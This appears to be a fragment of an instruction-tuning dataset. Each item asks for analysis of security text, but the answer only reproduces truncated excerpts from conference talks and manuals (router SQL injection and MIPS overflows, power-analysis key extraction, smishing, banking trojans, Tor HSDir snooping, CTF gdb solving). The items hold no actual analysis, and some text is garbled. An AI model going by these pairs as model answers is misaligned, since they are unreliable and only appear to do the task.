vi编辑器有三种工作方式命令方式输入方式和ex转义方式通过相应的命令或操作在这三种工作方式之间可以进行转换 **命令方式** 在Shell提示符后输入命令vi进入vi编辑器并处于vi的命令方式此时从键盘上输入的任何字符都被作为编辑命令来解释例如a(append表示附加命令i(insert表示插入命令x表示删除字符命令等如果输入的字符不是vi的合法命令则机器发出报警声光标不移动另外在命令方式下输入的字符即vi命令并不在屏幕上显示出来例如输入i屏幕上并无变化但通过执行i命令编辑器的工作方式却发生变化由命令方式变为输入方式 **输入方式** 通过输入vi的插入命令i附加命令a打开命令o替换命令s修改命令(c或取代命令r可以从命令方式进入输入方式在输入方式下从键盘上输入的所有字符都被插入到正在编辑的缓冲区中被当做该文件的正文进入输入方式后输入的可见字符都在屏幕上显示出来而编辑命令不再起作用仅作为普通字母出现例如在命令方式下输入字母i进到输入方式然后再输入i就在屏幕上相应光标处添加一个字母i 由输入方式回到命令方式的办法是按下Esc键如果已在命令方式下那么按下Esc键就会发出嘟嘟声为了确保用户想执行的vi命令是在命令方式下输入的不妨多按几下Esc键听到嘟声后再输入命令 **ex转义方式** vi和ex编辑器的功能是相同的二者的主要区别是用户界面在vi中命令通常是单个字母如a,x,r等而在ex中命令", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBefore the FEDERAL COMMUNICATIONS COMMISSION Washington, D.C. 20554 In the Matters of Unlicensed Operation in the TV Broadcast Bands Additional Spectrum for Unlicensed Devices Below 900 MHz and in the 3 GHz Band ET Docket No. 04-186 ET Docket No. 02-380 COMMENTS OF DELL INC., GOOGLE, INC., THE HEWLETT-PACKARD COMPANY, INTEL CORP., MICROSOFT CORP., AND PHILIPS ELECTRONICS NORTH AMERICA CORP. Scott Blake Harris Edmond J. Thomas S. Roberts Carter III HARRIS, WILTSHIRE & GRANNIS LLP 1200 Eighteenth Street, NW Washington, DC 20036 (202) 730-1300 January 31, 2007  Senior Policy Advisor Table of Contents SUMMARY ........................................................................................................................... ii I. THE COMMISSION SHOULD AUTHORIZE SPECTRUM SENSING TECHNOLOGY TO ENABLE USE OF LOW POWER UNLICENSED DEVICES IN THE TV WHITE SPACES.................................................................................................................... 3 A. Spectrum Sensing Offers the Best Solution for Identifying and Utilizing Available White Spaces.................................................................................... 3 1. Spectrum sensing is a proven, well understood technique. ........................ 4 2. Proposed operating parameters for spectrum sensing................................. 5 B. The Geolocation/Database and Control Signal Approaches are Neither Practicable nor Desirable.................................................................................. 9 C. Other Operating Parameters............................................................................ 12 1. Transmit power control............................................................................. 12 2. Other technical considerations.................................................................. 13 D. Testing.............................................................................................................. 18 II. THE COMMISSION SHOULD NO", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPower Analysis Attacks 能量分析攻擊 童御修1 李祐棠2 JP 2,3 陳君明4,5 鄭振牟1,3 1 國立臺灣大學 電機工程學系 2 國立臺灣大學 電信工程學研究所 3 中央研究院 資訊科技創新研究中心 4 國立臺灣大學 數學系 5 銓安智慧科技 (股) Agenda Introduction - Attacks on Implementations - Experiment Setup Demo -- Break AES-128 Power Analysis Attacks - Foundation - Example on AES-128 - Workflows 2 Traditional Cryptanalysis Attackers can only observe the external information What if we can see insides? 3 Attacks on Implementations Semi-invasive Non-invasive Invasive Microprobing Reverse engineering UV light, X-rays or lasers Side-channel attacks Attack scope Cost Side-channel attacks: Cheaper & effective 4 Side-Channel Attacks 旁通道攻擊 Attackers analyze the leakage from the devices Different keys cause different leakage! 5 6 Side Channel Attack 旁通道攻擊   AES Example: Acoustics Cryptanalysis Adi Shamir (S of RSA) et al, 2013 Execute GnuPGs RSA-4096 Capture and analyze Sound 7 Side-Channel Leakages Timing Power EM Others ex. Password comparison Paul Kocher proposed the first attack: DPA, Differential Power Analysis (1999) [CRI, Cryptography Research Inc.] Sound, temperature,  Similar to power consumption Power leakage is easier to deal with 8 Experiment Setup Oscilloscope Device Laptop control signal & input control signal output power traces measure signal 9 Analyze! Equipment (1) PicoScope 3206D with sampling rate 1GSa/s 10 NTD 50,000 Equipment (2) SAKURA evaluation board UEC Satoh Laboratory 11 NTD 100,000 Our Environment 12 Demo Extract the secret key from AES-128 on SmartCard Key: 13 11 1d 7f e3 94 4a 17 f3 07 a7 8b 4d 2b 30 c5 13 So Why Power Analysis Succeeds? 14 Foundation of Power Analysis (1) CMOS technology NMOS PMOS 0 1 0 1 15 Foundation of Power Analysis (2) Power consumption of CMOS inverter 0 1 -> 1 Discharging current -> 0 -> 0 Charging current -> 1 Short-circuit current 16 Foundation of Power Analysis (3) CMOS consumes much more power in dynamic state Thus we use the power model Power = a  # bitflips + b Hamming Weight: HW(101100) = 3 Hamming Distance: HD", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVulnerabilities of Wireless Water Meter Networks John McNabb johnmcnabb@comcast.net DEF CON 19 August 6, 2011 1 Background  13 years as an elected Water Commissioner  2 articles in NEWWA Journal on water infrastructure  10 years as lobbyist for Clean Water Action  6+ years as an IT Pro, mostly doing general tech support  2+ years as a security researcher, primarily interested in drinking water security & cyber security  Independent researcher; no school, company, or grant support  DEF CON 18 last year - Cyberterrorism & Security of the National Drinking Water Infrastructure  [March 2011 Hacker Japan article on my DC18 talk]  Shmoocon 2011  Hacking SmartWater Water Meters 2 Importance of Water  Water is essential for life.  Water is a scarce commodity  Water has been a source of conflict and war throughout human history.  Water is a $400 billion global industry. Water has been called the new oil.  Al Qaeda has repeatedly threatened to poison United States drinking water supplies.  Water is a critical infrastructure.  However, the American Society of Civil Engineers gives the nations drinking water infrastructure a D- grade and estimates that an investment of $255 billion is needed to bring the system to needed standards 3 Water Meter = Cash Register  Water Bill based on the difference between present reading and previous reading, which is usage  Usage x water rates = usage charge  $40 billion  the annual income of US water utilities, mostly from meter information  Average monthly water bill ranges from $34.29 a month in Phoenix compared to $65.47 in Boston for a family of four using 100 gallons per person each day.  The revenue is very important to support day to day operations as well as capital replacement which nationally is billions behind schedule. 4 What could go wrong? The June, 2011 audit of the Brockton, Mass. Water & Sewer Department found that :  most of the Citys meters were 15 years or older,  from FY2006 through FY2010 approximately 25% of the water bil", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom SQL Injection to MIPS Overflows Rooting SOHO Routers Zachary Cutlip Tactical Network Solutions Craig Heffner Acknowledgements What Im going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in Netgear routers Embedded device investigation process Live demo: Root shell & more Questions Read the paper Lots of essential details Not enough time in this talk to cover it all Please read it Why attack SOHO routers? Offers attacker privileged vantage point Exposes multiple connected users to attack Exposes all users Internet comms to snooping/ manipulation Often unauthorized side doors into enterprise networks Target device: Netgear WNDR3700 v3 Fancy-pants SOHO Wireless Router DLNA Multimedia server File server w/USB storage Very popular on Amazon Other affected devices Netgear WNDR 3800 Netgear WNDR 4000 Netgear WNDR 4400 First step: take it apart UART header UART to USB adapter USB port Helps analysis Retrieve SQLite DB Load a debugger onto the router Analyzing the Device Software Download firmware update from vendor, unpack See Craig Heffners blog for more on firmware unpacking http://www.devttys0.com/blog Linux--Woo hoo! $ binwalk ./WNDR3700v3-V1.0.0.18_1.0.14.chk DECIMAL HEX DESCRIPTION --------------------------------------------------- 86 0x56 LZMA compressed data 1423782 0x15B9A6 Squashfs filesystem $ dd if=WNDR3700v3-V1.0.0.18_1.0.14.chk of=kernel.7z bs=1 skip=86 count=1423696 $ p7zip -d kernel.7z $ strings kernel | grep 'Linux version' Linux version 2.6.22 (peter@localhost.localdomain) (gcc version 4.2.3) #1 Wed Sep 14 10:38:51 CST 2011 Target Application: MiniDLNA What is DLNA? Digital Living Network Alliance Interoperability between gadgets Multimedia playback, etc. But Most Importantly... Attack Surface Google reveals: open source! Source code analysis strings reports shipping binary is 1.0.18 Download source for our version. Search source for low-hanging fruit SQL injection: more than meets the eye Privileged", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHITCON Pacific 2016 Threats to the Korea Financial Sector Fly me to the BLACKMOON KYOUNG-JU KWAK, CEAT(Computer Emergency Analysis Team) FSI kjkwak@fsec.or.kr HITCON Pacific 2016 Career ~ 2015.4 KFTC (Korea Financial Telecommunications and Clearings Institute) KF-ISAC ~ 2016.6 CERT, FSI (Financial Security Institute) Currently, FSI CEAT Currently, Member of National Police Agency Cyber-Crime Advisory Committee Minister of Interior's Excellence Award, National Cyber Security Awards 2016 Highlighted Talks 1. The Case study of Incidents in Korea Financial Sector, International Symposium on Cyber Crime Response, 2014 2. Financial Security, Whitehat Contest, 2015 3. Ransomware Overview, SungKyunKwan University, 2016 4. The New Wave of CyberTerror in Korea Financial Sector, PACSEC Tokyo, 2016 5. Cyber Security : Threats to the Financial Sector, Jeju Cyber Security Conference, 2016 #About Me Kyoung-Ju Kwak (郭炅周) HITCON Pacific 2016 Agenda 1. Background 2. BLACKMOON 3. Take Down! 4. Conclusion BACKGROUND HITCON Pacific 2016 Pharming (Phishing + Farming) Background HITCON Pacific 2016 Internet Banking Service in South Korea Background - Security Programs HITCON Pacific 2016 Internet Banking Service in South Korea Background - NPKI (National Public Key Infrastructure) HITCON Pacific 2016 Internet Banking Service in South Korea Background - Security Card HITCON Pacific 2016 Internet Banking Service in South Korea Background - OTP (One Time Password) HITCON Pacific 2016 Financial Organizations Background Yessign operated by KFTC (Korea Financial Telecommunications and Clearings Institute) IFT Network = Interbank Fund Transfer HITCON Pacific 2016 Background FSS - Financial Supervisory Service Financial Organizations HITCON Pacific 2016 Background KISA - Korea Internet & Security Agency BLACKMOON HITCON Pacific 2016 BLACKMOON BLACKMOON? HITCON Pacific 2016 BLACKMOON HITCON Pacific 2016 BLACKMOON 黑月 (Blackmoon) Compiler HITCON Pacific 2016 BLACKMOON BLACKMOON BLACKMOON HOW TO FIND", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSmishsmash Blackhat 2022 About us Thomas Olofsson  Digital Nomad (many homes)  Founder sec-t.org  Co-founder FYEO Inc  Winner defcon CTFs ages ago  Secure coding and development  Likes threat actor research and incident investigations thomas@gofyeo.com Twitter: @skjortan Mikael Bystrom  Hardware and software hacker  Collector of hardware and intel  Picks locks and breaks stuff  Player of CTFs and chess  Co-founder FYEO Inc  Some other fun fact mikael.bystrom@gofyeo.com Twitter @gsocgsoc www.gofyeo.com Setting the scene Last couple of years there has been quite a few incidents where  Taken over accounts  Via phishing  Bypassing 2fa We wanted to research  How did they do it  What are the attack vectors  What is needed  Can we reproduce it  Can we help people protect against it Smishing (SMS phishing) We are seeing more and more text based phishing attacks by the day  most of the phishing protection mechanisms are not designed to protect against this as they are still mostly for email.  Smishing attacks have expanded by over 7x in the first two quarters of 2021 compare to 2020. *  Hard to verify integrity or sender or the messages  Less than 35% of The People Actually Know when Theyre Becoming the Target of Smishing Attacks * https://earthweb.com/smishing-statistics/ Why this sudden increase in smishing  Higher trust than emails!  Still fewer SMS than email spam  Much higher success rate than email spam due to less implemented counter measures Digital dumpster diving How did we find these phone numbers and Dump files  There is a whole online community dedicated to trading in stolen / leaked data  Both on clear-net sites and on the darknet  Go where the bad guys hang out. Getting the ducks in a row Once you have the dump files its all about making sense of the data  Listing some of the most popular leaked files and how many telephone numbers they contained. (Logo garden) a. Facebook.com - 123 million phone numbers and 180 million emails b. Jd.com - 96M c. Vk.com - 78M d.  All", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# String Sections ## .strtab: String Table 该节区描述默认的字符串表包含了一系列的以 NULL 结尾的字符串ELF 文件使用这些字符串来存储程序中的符号名包括 - 变量名 - 函数名 该节在运行的过程中不需要加载只需要加载对应的子集 .dynstr 节 一般通过对字符串的首个字母在字符串表中的下标来索引字符串 字符串表的首尾字节都是NULL此外索引为 0 的字符串要么没有名字要么就是名字为空其解释依赖于上下文字符串表也可以为空相应的其节区头部的 sh_size 成员将为 0在空字符串表中索引大于 0 的下标显然是非法的 一个节区头部的 sh_name 成员的值为其相应的节区头部字符串表节区的索引此节区由 ELF 头的 e_shstrndx 成员给出下图给出了一个包含 25 个字节的字符串表以及与不同索引相关的字符串 | 索引 | +0 | +1 | +2 | +3 | +4 | +5 | +6 | +7 | +8 | +9 | | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | | 0 | \\0 | n | a | m | e | . | \\0 | V | a | r | | 10 | i | a | b | l | e | \\0 | a | b | l | e | | 20 | \\0 | \\0 | x | x | \\0 | | | | | | 其中包含的字符串有 | 索引 | 字符串 | | ---- | -------- | | 0 | none | | 1 | name. | | 7 | Variable | | 11 | able | | 16 | able | | 24 | 空字符串 | 可以看出 - 字符串表索引可以引用节区中任意字节 - 字符串可以出现多次 - 可以存在对子字符串的引用 - 同一个字符串可以被引用多次 - 字符串表中也可以存在未引用的字符串 这部分信息在进行 `strip` 后就会消失 ## .shstrtab: Section Header String Table 该节区与 `.strtab` 的存储结构类似不过该节区存储的是节区名的字符串", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHoney Onions: Exposing Snooping Tor HSDir Relays Guevara'Noubir &'Amirali Sanatinia {noubir,'amirali}@ccs.neu.edu Northeastern'University 1 Motivations  Previous'research'studied'the'maliciousness'of'the'relays  Known'bad'Exit'nodes  Other'work'looked'at'the'nature'of'hidden'services'content  No'prior'work'on'the'Hidden'Service'Directories'(HSDirs)  Indexing'hidden'services'requires'modification'to'Tor,'which'can'be'an' indicator'of'some'effort'and'potentially'more'malicious'activities 2 Tor & Hidden Services  A'widely'used'practical'anonymity'infrastructure  Provides'anonymity'for'both'the'clients'and'the'server'through' hidden'services  Depends'on'the'honest'behavior'of'the'volunteering'relays  It'is'known'that'some'relays'are'misbehaving'(Bad'Exit'nodes)  Some'Exit'nodes'actively'try'to'perform'Man'in'the'Middle'Attack' (MITM)  Not'much'is'known'about'the'HSDirs or'Hidden'Services'in'general 3 Hidden Service Directories (HSDir) Client Hidden Service IP RP HSDir (1) (2) (3) (4) (5) (6) (7) 4 Ring of Responsible HSDirs 5 Honey Onions (HOnions)  Each'HOnion corresponds'to'a'server/process  Run'on'local'IP'address'(Hidden'Service)  Accessible'only'through'Tor'and'not'shared'anywhere  Three'schedules  Daily  Weekly  Monthly  Log'the'requests'for'further'investigation 6 HOnions Architecture 1. Generate honions ho i ho j 2. Place honions on HSDirs 3. Build bipartite graph On visit, mark potential HSDirs ho j di di+2 di+1 di di+1 di+2 On visit, add to bipartite graph 7 Set Cover Problem  !\"# = %&': )*+%+,-./0%123ℎ%!\"#2+%5-.6%  !7 = ℎ*8: !792*9%3ℎ.3%1.0%:2023,&  ; = !\"#  !7  = = ℎ*8,&8 % !7%%!\"#% %ℎ*8%1.0%A-.Bed%on%&'%and%was%visited}  % %\":%% ℎ*8,&'  =, &'  \"%  ℎ*8,&'  = R%TRU VWXY'Z  The'set'cover'is'an'NP-complete'problem  Can'be'calculated'using'approximation'algorithms  Set'cover'gives'the'lower'bound'on'the'number'of'snooping'HSDirs 8 Heuristic Approach  Input:'''''G(V,%E): Bipartitie graph'of'HOnions to'HSDirs  Output:''S:'Set'explaining'visits  \"  %  while,,,;%  !", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndiff === 比较给定的两个文件的不同 ## 补充说明 **diff命令** 在最简单的情况下比较给定的两个文件的不同如果使用-代替文件参数则要比较的内容将来自标准输入diff命令是以逐行的方式比较文本文件的异同处如果该命令指定进行目录的比较则将会比较该目录中具有相同文件名的文件而不会对其子目录文件进行任何比较操作 ### 语法 ```shell diff(选项)(参数) ``` ### 选项 ```shell -<行数>指定要显示多少行的文本此参数必须与-c或-u参数一并使用 -a或--textdiff预设只会逐行比较文本文件 -b或--ignore-space-change不检查空格字符的不同 -B或--ignore-blank-lines不检查空白行 -c显示全部内容并标出不同之处 -C<行数>或--context<行数>与执行-c-<行数>指令相同 -d或--minimal使用不同的演算法以小的单位来做比较 -D<巨集名称>或ifdef<巨集名称>此参数的输出格式可用于前置处理器巨集 -e或--ed此参数的输出格式可用于ed的script文件 -f或-forward-ed输出的格式类似ed的script文件但按照原来文件的顺序来显示不同处 -H或--speed-large-files比较大文件时可加快速度 -l<字符或字符串>或--ignore-matching-lines<字符或字符串>若两个文件在某几行有所不同而之际航同时都包含了选项中指定的字符或字符串则不显示这两个文件的差异 -i或--ignore-case不检查大小写的不同 -l或--paginate将结果交由pr程序来分页 -n或--rcs将比较结果以RCS的格式来显示 -N或--new-file在比较目录时若文件A仅出现在某个目录中预设会显示Only in目录文件A 若使用-N参数则diff会将文件A 与一个空白的文件比较 -p若比较的文件为C语言的程序码文件时显示差异所在的函数名称 -P或--unidirectional-new-file与-N类似但只有当第二个目录包含了第一个目录所没有的文件时才会将这个文件与空白的文件做比较 -q或--brief仅显示有无差异不显示详细的信息 -r或--recursive比较子目录中的文件 -s或--report-identical-files若没有发现任何差异仍然显示信息 -S<文件>或--starting-file<文件>在比较目录时从指定的文件开始比较 -t或--expand-tabs在输出时将tab字符展开 -T或--initial-tab在每行前面加上tab字符以便对齐 -u-U<列数>或--unified=<列数>以合并的方式来显示文件内容的不同 -v或--version显示版本信息 -w或--ignore-all-space忽略全部的空格字符 -W<宽度>或--width<宽度>在使用-y参数时指定栏宽 -x<文件名或目录>或--exclude<文件名或目录>不比较选项中所指定的文件或目录 -X<文件>或--exclude-from<文件>您可以将文件或目录类型存成文本文件然后在=<文件>中指定此文本文件 -y或--side-by-side以并列的方式显示文件的异同之处 --help显示帮助 --left-column在使用-y参数时若两个文件某一行内容相同则仅在左侧的栏位显示该行内容 --suppress-common-lines在使用-y参数时仅显示不同之处 ``` ### 参数 * 文件1指定要比较的第一个文件 * 文件2指定要比较的第二个文件 ### 实例 #### 以正常模式比较差异 ```shell diff a.txt b.txt ``` #### 以上下文 (context) 模式比较差异 ```shell diff -c a.txt b.txt ``` ```shell *** a1.txt 2012-08-29 16:45:41.000000000 +0800 --- a2.txt 2012-08-29 16:45:51.000000000 +0800 *************** *** 1,7 **** a a a !a a a a --- 1,7 ---- a a a !b a a a ``` #### 以联合 (unified) 模式比较差异 ```shell diff -u a.txt b.txt ``` ```shell --- a.txt 2012-08-29 16:45:41.000000000 +0800 +++ b.txt 2012-08-29 16:45:51.000000000 +0800 @@ -1,7 +1,7 @@ a a a -a +b a a a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# learn gdb General Skills, 300 points ## Description: > Using a debugging tool will be extremely useful on your missions. Can you run this program in gdb and find the flag? Attached was a binary file. ## Solution: Let's run the file: ```console root@kali:/media/sf_CTFs/pico/learn_gdb# ./run Decrypting the Flag into global variable 'flag_buf' ..................................... Finished Reading Flag into global variable 'flag_buf'. Exiting. ``` Simple enough. Let's inspect it with a disassembler: ```assembly root@kali:/media/sf_CTFs/pico/learn_gdb# r2 run -- In visual mode press 'c' to toggle the cursor mode. Use tab to navigate [0x00400690]> aa [x] Analyze all flags starting with sym. and entry0 (aa) [0x00400690]> afl 0x004005c0 3 26 sym._init 0x004005f0 1 6 sym.imp.putchar 0x00400600 1 6 sym.imp.puts 0x00400610 1 6 sym.imp.__stack_chk_fail 0x00400620 1 6 sym.imp.__libc_start_main 0x00400630 1 6 sym.imp.strtol 0x00400640 1 6 sym.imp.malloc 0x00400650 1 6 sym.imp.setvbuf 0x00400660 1 6 sym.imp.exit 0x00400670 1 6 sym.imp.usleep 0x00400680 1 6 fcn.00400680 0x00400690 1 41 entry0 0x004006c0 4 50 -> 41 sym.deregister_tm_clones 0x00400700 4 58 -> 55 sym.register_tm_clones 0x00400740 3 28 sym.__do_global_dtors_aux 0x00400760 4 38 -> 35 entry1.init 0x00400786 11 323 sym.decrypt_flag 0x004008c9 1 82 sym.main 0x00400920 4 101 sym.__libc_csu_init 0x00400990 1 2 sym.__libc_csu_fini 0x00400994 1 9 sym._fini [0x00400690]> s sym.main [0x004008c9]> pdf ;-- main: / (fcn) sym.main 82 | sym.main (int argc, char **argv, char **envp); | ; var int local_10h @ rbp-0x10 | ; var int local_4h @ rbp-0x4 | ; arg int argc @ rdi | ; arg char **argv @ rsi | ; DATA XREF from entry0 (0x4006ad) | 0x004008c9 55 push rbp | 0x004008ca 4889e5 mov rbp, rsp | 0x004008cd 4883ec10 sub rsp, 0x10 | 0x004008d1 897dfc mov dword [local_4h], edi ; argc | 0x004008d4 488975f0 mov qword [local_10h], rsi ; argv | 0x004008d8 488b05f90a20. mov rax, qword [obj.stdout__GLIBC_2.2.5] ; obj.__TMC_END ; [0x6013d8:8]=0 | ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInvisible Access Opening New Doors to Insecurity Marc Weber Tobias - Matt Fiddler - Tobias Bluzmanis 2009 Security.org Agenda  Standards and Requirements  Electro-Mechanical Locks  Critical Infrastructure and Vulnerabilities  Real World Threats  Case Study: Electronic Access Control technology Standards: Mechanical Locks  Why we need Standards  What They Measure  Limited Protocol - Few Tests  Exclude many Real World Attacks  Bumping  Mechanical Bypass  Knowledgeable and Special Attack Techniques - Not Contemplated Security Criteria: Standards  Define Conventional vs. High Security  Threat Criteria  Forced Entry  Covert Entry  Key Security  All Standards based upon  Time, Tools and Training Forced Entry UL437 and BHMA 156.30  Locks must be secure against Forced methods of Attack  Attack Resistance 5 Minutes  Excludes many methods of attack Covert Entry Protection  Minimum Security Criteria in UL437 and ANSI/BHMA 156.30  Protects against Certain forms of Covert Entry  Assures Minimum resistance to opening  (10 - 15 minutes)  Picking and Decoding  Master Key Attacks  Bumping (Not Covered) Key Security  Organizational Protection  Duplication of Keys  Keys Ordered by Code  Legal Protection  Availability of Blanks  Does not address Technical Security of Keys  Standards = Limited Security Categories of Locks  Conventional Mechanical Locks  High Security Mechanical Locks  Electronic Credentials  Electro-Mechanical Locks  Electronic Locks  Wired, Wireless, Data on Card Critical Questions  What is SECURITY re: Locks?  Is it secure enough?  What does a High Security rating mean?  The concept of key control, key security and why its important  Can the lock be compromised and how difficult is it?  Real World Threats  Methods to Compromise Conventional Lock Functions  Restrict WHO can enter  Prevent or Delay Unauthorized Access  Low to Medium security  Not Certified  Covert Entry often is easy Conventional Lock Vulnerabilities  Picking, Bumping, Decoding  Impressioning  Master Ke", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYou Spent All That Money ...And You Still Got Owned Presented By: Joe McCray joe@learnsecurityonline.com http://www.linkedin.com/in/joemccray http://twitter.com/j0emccray Let me take you back.... Step 1: Tell customer you are 31337 security professional Customers only applied patches if it fixed something on the system It was common practice NOT to apply system updates that didn't fix a problem you were experiencing on a system (WTF ARE YOU DOING - YOU MIGHT BREAK SOMETHING!!!!!) Step 2: Scan customer network with ISS or Nessus if you were a renegade Customers didn't apply patches, and rarely even had firewalls and IDSs back then You know you only ran ISS because it had nice reports... Step 3: Break out your uber 31337 warez and 0wn it all!!!!! You only kept an exploit archive to save time (Hack.co.za was all you needed back then) If you could read the screen you could 0wn the network!!!!!!! Penetration Testing Was Easy.... If you were Ub3r 31337 you did it like this.... Port Scan & Banner Grab The Target Get your exploit code... Own the boxes and take screen-shots Write The Report... Get Paid.... More Security Measures are being implemented on company networks today Firewalls are common place (perimeter and host-based) Anti-Virus is smarter (removes popular hacker tools, and in some cases stops buffer overflows Intrusion Detection/Prevention Systems are hard to detect let alone bypass NAC Solutions are making their way into networks Network/System Administrators are much more security conscious IT Hardware/Software vendors are integrating security into their SDLC . Geez...That's A Lot To Bypass Most load-balancers are deployed for redundancy and performance improvement As an attacker  load balancers are a headache. You have no idea where you packets are going.... There is absolutely no point in running tools against a host without knowing if a load balancer has been deployed. So  step 1 is to determine if the host is load balanced.... Step 2  determine what type of", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHIEMEWORKS WORLD TOUR 21 YEARS OF MISCHIEF AND MAYHEM Chicago New York San Francisco Seattle San Diego Boston Miami Orlando San Antonio Dallas Austin Houston New Orleans Baton Rouge Biloxi Los Alamos Atlanta Minneapolis Phoenix Denver Sun Valley Kansas City Detroit Des Moines St. Louis Las Vegas Lake Tahoe Reno Washington DC Fort Meade Sydney Brisbane Melbourne Canberra Auckland Wellington London Liverpool Amsterdam Berlin Heidelberg Warsaw Wodz Poland Victoria BC Montreal Calgary Ottawa Johannesburg Dubai Eilat/Tel Aviv Kuala Lumpur And Milwaukee WI Madison WI Green Bay WI Eau Claire WI La Crosse WI Sheboygan WI Racine WI Kenosha WI Waukesha WI Beloit WI Whitewater WI Port Washington WI Mequon WI Shorewood WI Whitefish Bay WI Brookfield WI Wauwatosa WI Clintonville WI Green Lake WI Ripon WI Grafton WI Random Lake WI Butler WI New Berlin WI St. Francis WI Burlington WI West Bend WI Waterford WI Delafield WI Muskego WI Elm Grove WI Pewaukee WI etc.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Human or Not: Can You Really Detect the Fake Voices? Liu Xin, Tan Yuan School of Information Science and Engineering, Lanzhou University #BHUSA @BlackHatEvents Information Classification: General Contents  Whats Fake Voice  Introduction of AI-synthesized speeches  Existing Detectors  Existing AI-synthesized Speech Detection Approaches  Problems in Existing Approaches  SiF-DeepVC  Voice Clone based on Deep Learning and Speaker-irrelative Features  Detection Bypass using SiF-DeepVC  Evaluation  Four experiments to prove our findings  Conclusion  Takeaways  Open-source code and datasets #BHUSA @BlackHatEvents Information Classification: General Whats Fake Voice #BHUSA @BlackHatEvents Information Classification: General Whats Fake Voice  Novel fake voices are AI-synthesized speeches  Commonly used for fraud, customer service, and authorization bypass  Voice Clone (VC) is the most dangerous one #BHUSA @BlackHatEvents Information Classification: General VC-based Crime #BHUSA @BlackHatEvents Information Classification: General History of Speech Synthesis  Old Days (Before 20th Century) Simulate sounds with different machines Very difficult to simulate human voice  Jigsaw Era (Before 2010) Automatic unit selection Very poor coherence and easy to detect  AI-synthesized speeches (Since 2010) Smooth and natural Difficult to detect #BHUSA @BlackHatEvents Information Classification: General AI-synthesized Speeches  Input: what you want to say, output: voice  Voice Clone (VC): Replace Voice Features! Linguistical Data Encoder Concat Attention Decoder Synthesizer Vocoder Voice Features Output Voice #BHUSA @BlackHatEvents Information Classification: General Existing Detectors #BHUSA @BlackHatEvents Information Classification: General Existing Detection Approaches  All existing approaches are reported very promising performance  Computer Vision (CV)-based approaches Inspired by image recognition techniques that are now quite mature  Convert voice to image and ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n绿盟科技 NSFOCUS WASM双刃剑机制剖析与逆向 演讲人赵光远 2 0 1 8 PART 01 WASM 目录 CONTENTS PART 02 Compile PART 03 挖矿实例 PART 04 探索方向 01 02 03 04 PART 01 WASM  前端编程无法解决的问题  传统的js脚本运行缓慢  在浏览器中无法实现复杂功能(效率不足影响体验)  很低的渲染能力却拥有CPUGPU极高的占用率  应用场景  浏览器页面3D环境渲染  数据压缩  图像/音频/视频的处理  挖矿(本身就是计算的一种)  .  支持度  WebAssembly(WASM)  基于栈的二进制格式文件  支持C/C++/Rust等高级语言的转换  理论上能够将现有的C/C++代码库直接编译运行无需重写  支持Write Once,Run anywhere  由JVM解释并执行运行时处于隔离环境中  不能直接操作Dom元素不能直接调用I/O  只能通过WebSocket对外通信  只能使用binaryen-shell与JavaScript交互  只能通过为JavaScript提供的接口进行调用  基于栈的运行机制 int add(int num) { return num+10; } 00 61 73 6D 0D 00 00 00 01 86 80 80 80 00 01 60 01 7F 01 7F 03 82 80 80 80 00 01 00 04 84 80 80 80 00 01 70 00 00 05 83 80 80 80 00 01 00 01 06 81 80 80 80 00 00 07 96 80 80 80 00 02 06 6D 65 6D 6F 72 79 02 00 09 5F 5A 35 61 64 64 34 32 69 00 00 0A 8D 80 80 80 00 01 87 80 80 80 00 00 20 00 41 0A 6A 0B get_local 0 i32.const 10 i32.add PART 02 编译及反编译过程 加载Emscripten库 Emscripten生成 通过映射转换 通过asm2wasm生成 C/C++ LLVM IR ASM.js TextFormat .wat BinaryFormat .wasm C/C++ WASM2C BinaryFormat .wasm  一个模块中包含的节(必需)  type  function  code  Type类型(部分)  int  i32  i64  float  f32  F64  functype  wasm的二进制文件格式  0x0 flag  0x4 magic  0x8 section_id  0x9 length  0xA type  0xB function type start  0xC val:type  0xE val:type   PART 03 挖矿实例  JavaScript脚本编写的挖矿程序利用coinhive提供的API  将JavaScript脚本编译为wasm在支持运行wasm运行的浏览器中执行挖矿行为不支持的浏览器会执行 JavaScript脚本  无技术含量只是一种应用但是为何在下载的时候没有检测出来 PART 04 研究方向  wasm在运行效率方面比JavaScript表现的更加出色因此wasm将被广泛应用在游戏虚拟场景模拟等方面这意 味着wasm在以后的应用中会占据一席之地  wasm运行在JVM沙箱中对外的交互基本上都由JavaScript进行接管JavaScript不了解WASM中运行的内容只 能获取到指定的返回信息  wasm对于JavaScript来说就是一个黑盒获知其中的运行状态及内容很难  大多数的WAF产品目前没有wasm解析器因此无法对其进行有效的特征检测及拦截  